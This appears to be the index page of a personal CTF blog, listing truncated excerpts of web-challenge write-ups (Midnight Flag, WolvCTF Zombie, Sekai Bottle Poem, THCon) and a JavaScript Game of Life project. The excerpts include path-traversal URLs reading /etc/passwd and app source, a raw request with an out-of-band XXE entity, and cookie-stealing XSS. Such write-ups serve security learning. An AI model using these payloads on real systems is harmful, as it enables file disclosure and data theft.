xl00t : CTF - Pentester - Testing things

Here go some of my learnings / CTF writeups and researches.

(Also some lazy writeups/scripts https://gist.github.com/xl00t )

Discord: xl00t#5697

Midnight Flag CTF 2023 Comme Une Chaussette

Comme dans une chaussette - Web Description A company that proposes to sanitize inputs for you, does that tempt you? This is the beta version, and I heard that they log everything to train their AI model. Take control of the server to check if all this is true! Additional information: Sources: https://cdn.midnightflag.fr/comme_dans_une_chaussette.zip You have all the files in the .zip provided to you (the flag file name as well as the webroot changes on the remote), there is no point in attacking the challenge directly if you don’t have a working payload locally....

April 17, 2023

WolvCTF 2023 Zombie 301 401

Zombie 301 and 401 - Web As debug off and httponly on its gonna be hard. maybe? IDEA Zombie last version is from 2018, maybe we will find some 0-day (1-day ofc if its the intended way) https://github.com/assaf/zombie/blob/master/CHANGELOG.md our version on the challenge is the last one, confirmed on package.json: { "name": "zombie", "version": "1.0.0", "description": "", "main": "index.js", "author": "", "dependencies": { "escape-html": "^1.0.3", "express": "^4.18.2", "zombie": "^6.1.4" } } Start of our research On the zombie....

March 20, 2023

WolvCTF 2023 Zombie 201

Zombie 201 - Web Description Congratulations, you got the admin’s cookie! Can you do it again? It might be a little harder this time. You are well on your way through the gauntlet. You can’t stop now. The task is the same as previous part “Zombie 101” challenge. All the files are the same, only the configuration is different. From docker-compose.yml file on line 9 we can see the configuration file changed....

March 19, 2023

WolvCTF 2023 Zombie 101

Zombie 101 - Web Description Can you survive the Zombie gauntlet!? First in a sequence of four related challenges. Solving one will unlock the next one in the sequence. They all use the same source code but each one has a different configuration file. This first one is a garden variety “steal the admin’s cookie”. Good luck! Reflected XSS on : https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=xsshere Following vulnerable code : app.get('/zombie', function(req, res) { const show = req....

March 19, 2023

Sekai CTF 2022 Bottle Poem

bottle-poem - web LFI here : http://bottle-poem.ctf.sekai.team/show?id=../../etc/passwd While enumerating we can see that this web app is a python one. (confirmed here http://bottle-poem.ctf.sekai.team/show?id=../../proc/self/cmdline) So we can try to get : http://bottle-poem.ctf.sekai.team/show?id=../app.py response : No!!!! To bypass this filter i tried: http://bottle-poem.ctf.sekai.team/show?id=.././app.py Like so we got the source of the app requesting http://bottle-poem.ctf.sekai.team/show?id=/app/app.py also works because of: requested_path = os.path.join(os.getcwd() + "/poems", param) If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component....

September 30, 2022

THCon CTF 2022 Secure Cloud

First step : XXE OOB Found on : http://challenges1.thcon.party:2000/create_pres.php POST /create_pres.php HTTP/1.1 Host: challenges1.thcon.party:2000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------34783305014501417421413273416 Content-Length: 524 Origin: http://challenges1.thcon.party:2000 Connection: close Referer: http://challenges1.thcon.party:2000/create_pres.php Cookie: token=8JGY8xbpVP1UXrQgAUf-W; PHPSESSID=quabf7p3f2b9ofsdhbfa4hi3mb Upgrade-Insecure-Requests: 1 -----------------------------34783305014501417421413273416 Content-Disposition: form-data; name="name" test -----------------------------34783305014501417421413273416 Content-Disposition: form-data; name="comment" --><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://x....

June 16, 2022

THCon CTF 2021 Modern Webchat

Modern Webchat Web (250 points/ 5 solves) Description IRC is a relic of the past. Solution We visit the website and we land on a web chat where we can choose a nickname and a color. We can login and then be able to send messages. From time to time we receive a message from the admin which says : [admin] LePireBot: Message restricted to administrators. Obviously we must fake the fact that we are admin in order to see the message....

June 12, 2021

Javascript Conway Game of Life

Here you can find a day project i had made in order to learn js. The goal was to reproduct the popular Conway’s Game of Life. This is how the game look like: Used technologies: HTML / Bootstrap JS / p5.js Functionnalities: Holding left click places cell and right click delete cells Pause and play the game. Set the frames per second of the game. Forward the game step by step (frame by frame) Clear the board Use predefined propular forms Make random cells on all the board Zoom/Unzoom will resize the board to full screen , reset the board and random the board Debugging cells position, values and neighbour count Demo HERE

March 20, 2021